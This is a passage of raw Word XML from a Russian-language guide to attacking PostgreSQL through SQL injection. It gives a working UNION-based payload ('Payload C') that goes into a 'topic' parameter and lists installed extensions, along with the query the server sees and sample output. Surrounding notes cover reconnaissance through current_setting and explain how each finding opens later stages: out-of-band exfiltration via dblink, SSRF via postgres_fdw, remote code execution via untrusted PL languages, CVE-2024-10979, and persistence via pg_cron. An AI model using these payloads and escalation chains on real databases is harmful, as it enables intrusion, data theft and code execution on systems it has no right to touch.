      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий невидим в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но может остаться в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgaudit.log</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B5D8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`row_security = on/off`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (rare в production), RLS отключён глобально → 3.17 не применим, но 3.13/3.8.3 проще.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8103AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на SELECT. Альтернатива — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для одной настройки за раз; через UNION с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пакетом короче.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76DDB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Полезные дополнительные настройки для отдельных запросов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07237A9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'on'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'off'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без падения для не-superuser (в отличие от чтения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>); быстрая проверка, эскалировалась ли роль (нужно после 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77238C0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('search_path')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → текущий search_path сессии; цель для проверки доступности 3.13.2 hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1100A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('cluster_name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → имя кластера, если задано (часто это совпадает с именем приложения — fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E911B62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — `pg_extension` (установленные расширения)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD470F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из Payload B — это то, что загружено в postmaster. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>установлено</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в текущей БД (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Разница: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чаще в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для 3.6 (OOB) и 3.7 (RCE) важно именно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FDAE96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `topic`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F6C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>x' UNION SELECT e.oid::int, e.extname || ' v' || e.extversion || ' [schema=' || n.nspname || ']', now() FROM pg_extension e JOIN pg_namespace n ON e.extnamespace = n.oid --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9583E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1B406" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93F6C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT e.oid::int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E739A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    e.extname || ' v' || e.extversion || ' [schema=' || n.nspname || ']',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655AFD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70479D39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_extension e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066796E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON e.extnamespace = n.oid --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F151E38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все extension-ы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78351F4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpgsql v1.0 [schema=pg_catalog]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF1927" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements v1.10 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74C5F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto v1.3 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB2B35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink v1.2 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A157CF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw v1.1 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55684BCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hstore v1.8 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D30CE2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uuid-ossp v1.1 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462012A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что атакующий из этого извлекает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED39547" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.6.1 применим (OOB через DNS/TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612A9B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.6.2 применим (SSRF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505EB75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.7.2/3.7.3 применимы (RCE через языковые функции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26CBC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (trusted) + кластер на PG &lt; 17.1/16.5/15.9/14.14/13.17 → CVE-2024-10979 (R7) применима.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63ACA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → persistence через scheduled jobs (вне scope раздела 3, но полезный сигнал).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3D1C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → доступны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>crypt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gen_random_bytes()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для оффлайн-операций, но также используется для проверки md5/SCRAM хешей — пригодится в chain с 3.8.3 Payload B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF34E81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Версия extension (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extversion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — для security-проверок самих extension-ов (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.0 имел известные NTLM-coercion баги на старых PG).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17177FD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также полезно сразу проверить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>доступные</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extension (не только установленные) через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_available_extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если в нём есть строки с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>installed_version IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t>, атакующий после superuser-эскалации может их доставить (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
